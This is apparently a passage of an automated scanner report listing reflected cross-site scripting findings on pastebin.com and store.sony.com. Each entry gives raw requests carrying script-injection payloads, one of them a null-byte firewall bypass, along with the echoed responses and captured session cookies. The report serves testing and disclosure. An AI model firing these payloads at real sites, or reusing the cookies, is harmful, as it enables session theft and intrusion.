1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf56"><script>alert(1)</script>0f8d2babee7 was submitted in the REST URL parameter 3. This input was echoed as faf56\"><script>alert(1)</script>0f8d2babee7 in the application's response.
Request
GET /etc/social/index.htmlfaf56"><script>alert(1)</script>0f8d2babee7 HTTP/1.1/bq8xJPMn/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/etc/social/index.htmlfaf56\"><script>alert(1)</script>0f8d2babee7 "/>...[SNIP]...
1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7dc"><script>alert(1)</script>bda8880cef7 was submitted in the REST URL parameter 1. This input was echoed as cc7dc\"><script>alert(1)</script>bda8880cef7 in the application's response.
Request
GET /favicon.icocc7dc"><script>alert(1)</script>bda8880cef7 HTTP/1.1;q=0.3.1315350535.1315350535.1315350535.1; __utmb=47852966.1.10.1315350535; __utmc=47852966; __utmz=47852966.1315350535.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php; __qca=P0-143015204-1315350538245
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/favicon.icocc7dc\"><script>alert(1)</script>bda8880cef7 "/>...[SNIP]...
1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ddd"><script>alert(1)</script>cf73614236c was submitted in the REST URL parameter 1. This input was echoed as d3ddd\"><script>alert(1)</script>cf73614236c in the application's response.
Request
GET /id3ddd"><script>alert(1)</script>cf73614236c /fixed.css?1 HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/id3ddd\"><script>alert(1)</script>cf73614236c /fixed.css?1"/>...[SNIP]...
1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864d"><script>alert(1)</script>7c325f7bd4e was submitted in the REST URL parameter 2. This input was echoed as 4864d\"><script>alert(1)</script>7c325f7bd4e in the application's response.
Request
GET /i/fixed.css4864d"><script>alert(1)</script>7c325f7bd4e ?1 HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/i/fixed.css4864d\"><script>alert(1)</script>7c325f7bd4e ?1"/>...[SNIP]...
1.21. http://pastebin.com/i/style.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/style.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99db1"><script>alert(1)</script>5c32890a4a was submitted in the REST URL parameter 1. This input was echoed as 99db1\"><script>alert(1)</script>5c32890a4a in the application's response.
Request
GET /i99db1"><script>alert(1)</script>5c32890a4a /style.css?12 HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/i99db1\"><script>alert(1)</script>5c32890a4a /style.css?12"/>...[SNIP]...
1.22. http://pastebin.com/i/style.css [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/style.css
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4cc"><script>alert(1)</script>b321a1af605 was submitted in the REST URL parameter 2. This input was echoed as ed4cc\"><script>alert(1)</script>b321a1af605 in the application's response.
Request
GET /i/style.cssed4cc"><script>alert(1)</script>b321a1af605 ?12 HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/i/style.cssed4cc\"><script>alert(1)</script>b321a1af605 ?12"/>...[SNIP]...
1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/js/ZeroClipboard.swf
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ae8"><script>alert(1)</script>cd11aa5c8e0 was submitted in the REST URL parameter 1. This input was echoed as 25ae8\"><script>alert(1)</script>cd11aa5c8e0 in the application's response.
Request
GET /js25ae8"><script>alert(1)</script>cd11aa5c8e0 /ZeroClipboard.swf HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/js25ae8\"><script>alert(1)</script>cd11aa5c8e0 /ZeroClipboard.swf"/>...[SNIP]...
1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/js/ZeroClipboard.swf
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac32"><script>alert(1)</script>a0c8a47198e was submitted in the REST URL parameter 2. This input was echoed as dac32\"><script>alert(1)</script>a0c8a47198e in the application's response.
Request
GET /js/ZeroClipboard.swfdac32"><script>alert(1)</script>a0c8a47198e HTTP/1.1/bq8xJPMn;q=0.3
Response
HTTP/1.1 404 Not Found/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .com/js/ZeroClipboard.swfdac32\"><script>alert(1)</script>a0c8a47198e "/>...[SNIP]...
1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a90df"><a>002cb1260d was submitted in the Ntk parameter. This input was echoed unmodified in the application's response.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd&langId=-1&Ntk=Producta90df"><a>002cb1260d &storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... =dvd+cd&Ntk=Producta90df"><a>002cb1260d &langId=-1&storeId=10151&Ntx=mode matchallpartial&y=0&N=0&catalogId=10551&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntt request parameter is copied into a JavaScript rest-of-line comment. The payload 22e7a%0af613d80aa8c was submitted in the Ntt parameter. This input was echoed as 22e7a in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c &langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... 22e7a '+epotpageImpression;...[SNIP]...
1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The value of the Ntt request parameter is copied into the HTML document as plain text between tags. The payload 17748<a%20b%3dc>df6b2e2de39 was submitted in the Ntt parameter. This input was echoed as 17748<a b=c>df6b2e2de39 in the application's response.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd17748<a%20b%3dc>df6b2e2de39 &langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... /microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd cd17748<a b=c>df6b2e2de39');return false;">17748<a b=c>df6b2e2de39 " on <span class="searchTerm">...[SNIP]...
1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00119e4"><script>alert(1)</script>575ce0e01d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 119e4"><script>alert(1)</script>575ce0e01d1 in the application's response.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0&%00119e4"><script>alert(1)</script>575ce0e01d1 =1 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... ?langId=-1&.119e4"><script>alert(1)</script>575ce0e01d1 =1&storeId=10151&y=0&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">...[SNIP]...
1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
